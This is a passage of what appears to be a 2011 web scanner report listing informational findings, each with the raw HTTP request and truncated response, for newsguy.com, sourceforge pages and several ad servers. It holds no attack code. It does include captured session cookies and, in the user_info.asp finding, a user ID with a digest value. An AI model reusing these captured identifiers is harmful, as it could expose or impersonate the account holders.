HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 13 Dec 2010 16:59:29 GMT
Accept-Ranges: bytes
ETag: "7530831be79acb1:0"
Server: Microsoft-IIS/7.5
Set-Cookie: .ASPXANONYMOUS=Zp0XbajyywEkAAAAZWM2YzU2NDctMGQ0MS00NTRiLTg3MjAtODkyOWJlNTZkYjMwotiPvRfVPBCcZB-Roj_am2LclWLUcGsowsZZPIHjTQg1; expires=Mon, 04-Apr-2011 09:12:30 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 22:32:30 GMT
Connection: close
Content-Length: 214

<html>
<head>
<meta http-equiv="refresh" content="0;url=http://classiccars.com/sell.html?utm_source=traderonline&utm_medium=link&utm_content=sell&utm_campaign=collector_cars">
</head>
<body>
</bo
...[SNIP]...

30.37. http://dave.willfork.com/slrnface/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dave.willfork.com
Path:	/slrnface/

Request

GET /slrnface/ HTTP/1.1
Host: dave.willfork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

30.38. http://delb.opt.fimserve.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://delb.opt.fimserve.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: delb.opt.fimserve.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pfuid=ClIoJk0pDkd8SnPo7AmDAg==; UI=284ab5a022ca529df|f..9.f.f.f.f@@f@@f@@f@@f@@f@@f; LO=00JW6MJ6I1c0G05B0010OPU; ssrtb=0

Response

HTTP/1.1 404 /favicon.ico
Server: Apache-Coyote/1.1
ETag: W/"10-1172631264000"
Last-Modified: Wed, 28 Feb 2007 02:54:24 GMT
Content-Type: text/html
Content-Length: 10
Date: Tue, 25 Jan 2011 13:09:45 GMT

Not found

30.39. http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1596198292@x23

Request

Response

30.40. http://dm.de.mookie1.com/2/B3DM/DLX/11596989115@x92 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/DLX/11596989115@x92

Request

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:35:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1549
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

30.41. http://dm.de.mookie1.com/2/B3DM/DLX/@x94 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/DLX/@x94

Request

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:35:49 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 915
Content-Type: text/html

<script>
var oas_d=new Date();
var oas_m=oas_d.getTime();

oas_d.setTime(oas_m+86400000);
document.cookie="dlx_20100929=set;expires="+oas_d.toGMTString()+";path=/;domain=.mookie1.com";

oas_d.s
...[SNIP]...

30.42. http://ds.addthis.com/red/psi/sites/www.abbreviations.com/p.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ds.addthis.com
Path:	/red/psi/sites/www.abbreviations.com/p.json

Request

GET /red/psi/sites/www.abbreviations.com/p.json HTTP/1.1
Host: ds.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: uid=4d1ec56b7612a62c; dt=X; psc=4; di=%7B%7D..1295452270.19F|1295903322.60|1293848200.66; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; bt=;

Response

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Length: 157
Content-Type: text/html
Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 24 Jan 2011 22:35:31 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 23 Feb 2011 22:35:31 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Mon, 24 Jan 2011 22:35:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 22:35:31 GMT
Connection: close

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (500 Internal Server Error) has occured in response to this request.
</BODY>
</HTML>

30.43. http://famspam.com/facebox/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://famspam.com
Path:	/facebox/

Request

GET /facebox/ HTTP/1.1
Host: famspam.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 24 Jan 2011 22:35:39 GMT
Content-Type: text/html
Content-Length: 291
Last-Modified: Wed, 23 Jun 2010 18:40:47 GMT
Connection: close
Expires: Tue, 25 Jan 2011 22:35:39 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes

<!DOCTYPE html>
<html>
<head>
<title>http://defunkt.github.com/facebox/</title>
<meta http-equiv="refresh" content="0;url=http://defunkt.github.com/facebox/"></head>
<body>
<a href="ht
...[SNIP]...

30.44. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Request

Response

30.45. http://golded-plus.sourceforge.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://golded-plus.sourceforge.net
Path:	/

Request

GET / HTTP/1.1
Host: golded-plus.sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

30.46. http://grn.sourceforge.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://grn.sourceforge.net
Path:	/

Request

GET / HTTP/1.1
Host: grn.sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Mon, 24 Jan 2011 22:35:56 GMT
Content-Type: text/html
Connection: close
Last-Modified: Thu, 14 Sep 2000 07:42:15 GMT
ETag: "409-37139a591c3c0"
Accept-Ranges: bytes
Content-Length: 1033
Cache-Control: max-age=172800
Expires: Wed, 26 Jan 2011 22:35:56 GMT

<html>
<head>
<title>GRN - Gnome ReadNews</title>
</head>
<body bgcolor="#ffffff" text="#000000" marginwidth="0" marginheight="0" leftmargin="0" topmargin="0">

<P>
Gnome ReadNews is a Perl-extensible
...[SNIP]...

30.47. http://home.big.or.jp/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.big.or.jp
Path:	/

Request

GET / HTTP/1.1
Host: home.big.or.jp
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:36:24 GMT
Server: Apache/1.3.33 (Unix) PHP/4.3.10
Last-Modified: Thu, 06 Nov 2008 07:59:31 GMT
ETag: "7d43-71f-4912a3e3"
Accept-Ranges: bytes
Content-Length: 1823
Connection: close
Content-Type: text/html
X-Pad: avoid browser bug

<Html Lang="ja">
<Head>
<META HTTP-EQUIV="refresh" CONTENT="15;url=http://home.big.jp/">
<Meta Name="keywords" Content=".C...^.[.l.b.g.v...o.C._.[ .....^...T.[.o.[ 1Gbps .....o.b.N.{.[.. .i..">
<Title
...[SNIP]...

30.48. http://hostedusa3.whoson.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hostedusa3.whoson.com
Path:	/

Request

GET / HTTP/1.1
Host: hostedusa3.whoson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File not found
Content-Type: text/html
Content-Length: 52

<html><body><p>File does not exist</p></body></html>

30.49. http://hostedusa3.whoson.com/include.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hostedusa3.whoson.com
Path:	/include.js

Request

GET /include.js HTTP/1.1
Host: hostedusa3.whoson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 315

document.write("<div style='text-align:center;padding:5px'>WhosOn Live Stats & Live Chat services are not active for this site. Please remove the tracking code or re-activate your service. Please
...[SNIP]...

30.50. http://hostedusa3.whoson.com/invite.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hostedusa3.whoson.com
Path:	/invite.js

Request

GET /invite.js HTTP/1.1
Host: hostedusa3.whoson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

30.51. http://husky.sourceforge.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://husky.sourceforge.net
Path:	/

Request

GET / HTTP/1.1
Host: husky.sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

30.52. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Request

GET /ptj HTTP/1.1
Host: ib.adnxs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anj=Kfu=8fG7*@E:3F.0s]#%2L_'x%SEV/hnK7#=G#<huqu*`^-sAq$WMQgDurvViCC?96j]`^R97vYErn/P%y7hV$-E>]QZwo$4KNAv/8Bif.W)@Ep8]r]Cyg_ofRS=83[A7^uy>nO*vPsV+<4T6e>%p9J?'OhPeH+Cb.*%ye8n70CgM50x.%X%nN!':o/2r24FH/[2b'Nk; icu=EAAYAA..; uuid2=4760492999213801733; sess=1;

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Tue, 25 Jan 2011 15:05:12 GMT
Content-Length: 134
Connection: close

<HTML><HEAD>
<TITLE>400 Bad Request</TITLE>
</HEAD><BODY>
<H1>Method Not Implemented</H1>
Invalid method in request<P>
</BODY></HTML>

30.53. http://ifmail.sourceforge.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ifmail.sourceforge.net
Path:	/

Request

GET / HTTP/1.1
Host: ifmail.sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Mon, 24 Jan 2011 22:36:35 GMT
Content-Type: text/html
Connection: close
Last-Modified: Mon, 27 Aug 2001 04:38:18 GMT
ETag: "1271-38c7b86a5a280"
Accept-Ranges: bytes
Content-Length: 4721
Cache-Control: max-age=172800
Expires: Wed, 26 Jan 2011 22:36:35 GMT

<HTML><HEAD><TITLE>
Ifmail - Fidonet to Internet mail and news gateway program
</TITLE></HEAD>

<BODY TEXT=white LINK=#ffff80 VLINK=#d0d020 BGCOLOR=#101050>

<CENTER>
<A href="http://sourceforge.net/"
...[SNIP]...

30.54. http://jqueryui.com/about previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/about

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

30.55. http://jqueryui.com/themeroller/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Request

GET /themeroller/ HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

30.56. http://loadus.exelator.com/load/net.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://loadus.exelator.com
Path:	/load/net.php

Request

Response

30.57. http://mako.cc/projects/aub/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mako.cc
Path:	/projects/aub/

Request

Response

30.58. http://mako.cc/projects/aub/docs/aub.1.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mako.cc
Path:	/projects/aub/docs/aub.1.html

Request

GET /projects/aub/docs/aub.1.html HTTP/1.1
Host: mako.cc
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

30.59. http://mako.cc/projects/aub/docs/aubconf.1.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mako.cc
Path:	/projects/aub/docs/aubconf.1.html

Request

GET /projects/aub/docs/aubconf.1.html HTTP/1.1
Host: mako.cc
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

30.60. http://media.fastclick.net/w/pg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.fastclick.net
Path:	/w/pg

Request

Response

30.61. http://media.fastclick.net/w/win.bid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.fastclick.net
Path:	/w/win.bid

Request

GET /w/win.bid?sid=54816&m=1&t=n&tp=5&d=f&mid=477674&EIC=1102509515205556&vch=554879014744&sys=3&evert=498003&vtid=14839&cb=1398482484&asite=2061501907&txid=9eb0b645-887a-48fe-96d9-a8ec0d65be5c&UD=CQAA7FD8nj1AEQAAAID1_gM-GQAAACBWDx8-KAAwAQ&wp=TT4pUwACvIcK5XsjKRZgBOX45riQQ1x_qFMGTg&walsh=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhNNGUyk-TYf5CqP2lQeEwNnIAqmp2NwBybvEzxX5pf__EQAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi0xMTg5MzcwNDA4OTk4NTU1oAGb5-foA7IBDmpvb21sYWNvZGUub3JnugEJNzI4eDkwX2FzyAEJ2gEyaHR0cDovL2pvb21sYWNvZGUub3JnL2dmL3Byb2plY3Qvam9vbWxhL3JlcG9ydGluZy-YAgrAAgTIAr23iA7gAgDqAhdKb29tbGFfSm9vbWxhY29kZUZvb3RlcqgDAegD8gPoA6gG6AM16AO5AugD2gX1AwAAAET1AwIAAADgBAE%26num%3D1%26sig%3DAGiWqtxXfy71xAYmo2tqD6PMiVjHwATbrg%26client%3Dca-pub-1189370408998555%26adurl%3D HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: zru=1|:1294800534|; lxc=AgAAAASMFi1NACAABHVydDE3IAfgBAADMwAAluAUHwEAAA==; lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; pluto=517004695355|v1

Response

30.62. http://mediacdn.disqus.com/1295633860 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mediacdn.disqus.com
Path:	/1295633860

Request

GET /1295633860 HTTP/1.1
Host: mediacdn.disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __qca=P0-473502224-1295482487215;

Response

HTTP/1.0 404 Not Found
Server: nginx/0.5.30
Date: Mon, 24 Jan 2011 22:42:30 GMT
Content-Type: text/html
Content-Length: 529
X-Cache: MISS from chafe.disqus.net
X-Cache-Lookup: HIT from chafe.disqus.net:3128
X-Cache: MISS from cdce-nym011-015.nym011.internap.com
X-Cache: MISS from cdce-nym011-014.nym011.internap.com
Via: 1.1 chafe.disqus.net:3128 (squid), 1.0 cdce-nym011-015.nym011.internap.com:1081 (squid/2.7.STABLE7), 1.0 cdce-nym011-014.nym011.internap.com:80 (squid/2.7.STABLE7)
Connection: close

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.5.30</center>
</body>
</html>
<!-- The padding to disable MSI
...[SNIP]...

30.63. http://mediacdn.disqus.com/1295633860/html/xdm.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mediacdn.disqus.com
Path:	/1295633860/html/xdm.html

Request

GET /1295633860/html/xdm.html HTTP/1.1
Host: mediacdn.disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __qca=P0-473502224-1295482487215;

Response

HTTP/1.0 200 OK
Date: Sat, 22 Jan 2011 08:04:34 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Fri, 21 Jan 2011 18:30:10 GMT
Accept-Ranges: bytes
Content-Length: 2226
Cache-Control: max-age=2592000
Expires: Mon, 21 Feb 2011 08:04:34 GMT
Vary: Accept-Encoding
Content-Type: text/html
Age: 225475
X-Cache: HIT from media.disqus.com
X-Cache-Lookup: HIT from media.disqus.com:3128
X-Cache: MISS from cdce-nym011-010.nym011.internap.com
X-Cache: MISS from cdce-nym011-010.nym011.internap.com
Via: 1.1 media.disqus.com:3128 (squid), 1.0 cdce-nym011-010.nym011.internap.com:1082 (squid/2.7.STABLE7), 1.0 cdce-nym011-010.nym011.internap.com:80 (squid/2.7.STABLE7)
Connection: close

<!doctype html>
<html>
<head>
<title></title>
<meta http-equiv="CACHE-CONTROL" content="PUBLIC"/>
<meta http-equiv="EXPIRES" content="Sat, 01 Jan 2050 00:00:00 GMT"/>
<
...[SNIP]...

30.64. http://mig.nexac.com/2/B3DM/DLX/1@x96 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mig.nexac.com
Path:	/2/B3DM/DLX/1@x96

Request

Response

30.65. http://netwinsite.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://netwinsite.com
Path:	/

Request

GET / HTTP/1.1
Host: netwinsite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:43:02 GMT
Server: Apache/1.3.37 (Unix) PHP/5.2.9 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html
Content-Length: 22794

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>Fast Reliable Mail Server, stops spam and viruses, easy
...[SNIP]...
</title>
<meta http-equiv="Content-Type" content="text/html;">
<META NAME="keywords" CONTENT="mail server, email server, windows mail server, mail server software, secure, antivirus, webmail, pop, pop3, imap, imap4, smtp, linux, mail-server, ssl, free mail server
...[SNIP]...

30.66. http://newsgrab.sourceforge.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newsgrab.sourceforge.net
Path:	/

Request

GET / HTTP/1.1
Host: newsgrab.sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Mon, 24 Jan 2011 22:43:22 GMT
Content-Type: text/html
Connection: close
Last-Modified: Tue, 12 Aug 2003 20:17:52 GMT
ETag: "23d-3c4b7ff55bc00"
Accept-Ranges: bytes
Content-Length: 573
Cache-Control: max-age=172800
Expires: Wed, 26 Jan 2011 22:43:22 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://sourceforge.net/projects/newsgrab/">

<TITLE>Newsgrab</TITLE>
</HEAD>
<BODY>
<B>Ohoy!
...[SNIP]...

30.67. http://newsguy.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newsguy.com
Path:	/

Request

Response

30.68. http://newsguy.com/accountbandwidth.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newsguy.com
Path:	/accountbandwidth.htm

Request

Response

30.69. http://newsguy.com/accountemail.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newsguy.com
Path:	/accountemail.htm

Request

Response

30.70. http://newsguy.com/affiliate.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newsguy.com
Path:	/affiliate.htm

Request

Response

30.71. http://newsguy.com/allinone.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newsguy.com
Path:	/allinone.htm

Request

Response

30.72. http://newsguy.com/birthday.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newsguy.com
Path:	/birthday.htm

Request

Response

30.73. http://newsguy.com/bonusbytes.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newsguy.com
Path:	/bonusbytes.htm

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:44:36 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=04c5bbd1a9491007cb5f91203243e58b; path=/
Content-Length: 15560
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<meta http-equiv="Content-Language" content="en-us">

<title>Newsguy -
...[SNIP]...

30.74. http://newsguy.com/cellphone.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newsguy.com
Path:	/cellphone.htm

Request

Response

30.75. http://newsguy.com/commd6.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newsguy.com
Path:	/commd6.htm

Request

Response

30.76. http://newsguy.com/contact.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newsguy.com
Path:	/contact.htm

Request

Response

30.77. http://newsguy.com/copy.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newsguy.com
Path:	/copy.htm

Request

Response

30.78. http://newsguy.com/diagnostics.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newsguy.com
Path:	/diagnostics.htm

Request

Response

30.79. http://newsguy.com/email.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newsguy.com
Path:	/email.htm

Request

Response

30.80. http://newsguy.com/groups.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newsguy.com
Path:	/groups.htm

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:44:36 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=0e6392c5076efee38380c3142855f369; path=/
Content-Length: 15879
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - NewsguyGroups... - Overview</title>
<meta NAME="descri
...[SNIP]...

30.81. http://newsguy.com/ispcon.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newsguy.com
Path:	/ispcon.htm

Request

Response

30.82. http://newsguy.com/members.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newsguy.com
Path:	/members.htm

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:43:53 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=00da9a944623b64631e869c738c369e5; path=/
Content-Length: 44100
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - Member Services and Features</title>
<meta NAME="descr
...[SNIP]...

30.83. http://newsguy.com/msgpanel/message.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newsguy.com
Path:	/msgpanel/message.asp

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:53:35 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Content-Length: 45101
Cache-Control: private
Content-Type: text/html

<head>
<style type="text/css">

</styl
...[SNIP]...

30.84. http://newsguy.com/news.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newsguy.com
Path:	/news.asp

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:44:05 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=0e83dea317d99a7de52fe1750cde8b8b; path=/
Content-Length: 46840
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - Accessing Newsgroups With Direct Read News</title>
<me
...[SNIP]...

30.85. http://newsguy.com/news.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newsguy.com
Path:	/news.htm

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:44:05 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=07d8619e23c66c94db17f947a018eeac; path=/
Content-Length: 46840
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - Accessing Newsgroups With Direct Read News</title>
<me
...[SNIP]...

30.86. http://newsguy.com/newsguys.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newsguy.com
Path:	/newsguys.htm

Request

Response

30.87. http://newsguy.com/overview.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newsguy.com
Path:	/overview.htm

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:43:39 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=07c1fd007b57ee5d13cb4f4071a9b2eb; path=/
Content-Length: 33263
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - Newsguy's Account Options</title>
<meta NAME="descript
...[SNIP]...

30.88. http://newsguy.com/policy.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newsguy.com
Path:	/policy.htm

Request

Response

30.89. http://newsguy.com/services.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newsguy.com
Path:	/services.htm

Request

Response

30.90. http://newsguy.com/user_info.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newsguy.com
Path:	/user_info.asp

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:53:36 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Content-Length: 139
Expires: Mon, 24 Jan 2011 14:53:42 GMT
Cache-Control: no-cache
Content-Type: text/html

DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256
USERID=h02332
DNDDATA=200+6100000+0+0+2011012423+20110223+200+6100000+0+3050000
MAILDATA=

30.91. http://noisybox.net/computers/nzbperl/ previous next

Summary

